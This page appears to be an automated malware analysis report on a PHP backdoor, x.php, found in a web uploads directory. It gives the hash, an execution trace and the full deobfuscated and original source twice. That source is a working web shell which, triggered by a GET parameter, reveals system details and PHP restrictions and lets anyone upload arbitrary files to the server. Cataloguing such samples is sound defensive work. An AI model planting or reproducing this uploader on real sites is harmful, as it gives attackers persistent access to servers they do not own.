PHP Malware Analysis

x.php

md5: 98d64e162b4b145311289d9a7e062dc2

Deobfuscated PHP code

<?php

if (isset($_GET["klash"])) {
    echo "<font color=#000000>[uname]" . php_uname() . "[/uname]";
    echo "<br>";
    print "\n";
    if (@ini_get("disable_functions")) {
        echo "DisablePHP=" . @ini_get("disable_functions");
    } else {
        echo "Disable PHP = NONE";
    }
    echo "<br>";
    print "\n";
    if (@ini_get("safe_mode")) {
        echo "Safe Mode = ON";
    } else {
        echo "Safe Mode = OFF";
    }
    echo "<br>";
    print "\n";
    echo "<form method=post enctype=multipart/form-data>";
    echo "<input type=file name=f><input name=v type=submit id=v value=up><br>";
    if ($_POST["v"] == up) {
        if (@copy($_FILES["f"]["tmp_name"], $_FILES["f"]["name"])) {
            echo "<b>Uploade Done</b>-->" . $_FILES["f"]["name"];
        } else {
            echo "<b>gagal";
        }
    }
}
echo "<!-- s7_C3ek= -->";
echo "<br>";

Execution traces

data/traces/98d64e162b4b145311289d9a7e062dc2_trace-1676259121.7245.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 01:32:27.622351]
1	0	1	0.000153	393464
1	3	0	0.000230	399960	{main}	1		/var/www/html/uploads/x.php	0	0
1	3	1	0.000248	399960
			0.000274	314200
TRACE END   [2023-02-13 01:32:27.622502]


Generated HTML code

<html><head></head><body><br></body></html>

Original PHP code

<?php
if (isset($_GET["klash"])) {
    echo "<font color=#000000>[uname]" . php_uname() . "[/uname]";
    echo "<br>";
    print "\n";
    if (@ini_get("disable_functions")) {
        echo "DisablePHP=" . @ini_get("disable_functions");
    } else {
        echo "Disable PHP = NONE";
    }
    echo "<br>";
    print "\n";
    if (@ini_get("safe_mode")) {
        echo "Safe Mode = ON";
    } else {
        echo "Safe Mode = OFF";
    }
    echo "<br>";
    print "\n";
    echo "<form method=post enctype=multipart/form-data>";
    echo "<input type=file name=f><input name=v type=submit id=v value=up><br>";
    if ($_POST["v"] == up) {
        if (@copy($_FILES["f"]["tmp_name"], $_FILES["f"]["name"])) {
            echo "<b>Uploade Done</b>-->" . $_FILES["f"]["name"];
        } else {
            echo "<b>gagal";
        }
    }
}
?><?php
echo "<!-- s7_C3ek= -->";
echo "<br>";
?>